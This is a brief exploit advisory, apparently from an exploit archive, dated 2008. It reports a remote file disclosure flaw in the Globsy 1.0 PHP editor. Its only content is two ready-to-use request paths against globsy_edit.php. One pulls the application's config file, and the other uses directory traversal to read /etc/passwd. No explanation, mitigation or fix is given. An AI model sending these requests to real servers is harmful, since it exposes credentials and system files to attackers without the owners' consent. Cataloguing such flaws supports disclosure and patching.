id: 2673
date: 02/20/2008
title: Globsy 1.0 (file) Remote File Disclosure Vulnerability
author: GoLd_M
cves: 

======================================================
Globsy 1.0 (file) Remote File Disclosure Vulnerability
======================================================


Globsy 1.0 (file) Remote File Disclosure Vulnerability
http://switch.dl.sourceforge.net/sourceforge/globsy/globsy_1.0.tar.gz
/globsy_edit.php?file=globsy_config.php
/globsy_edit.php?file=../../../../../../../etc/passwd



#  0day.today [2023-03-21]  #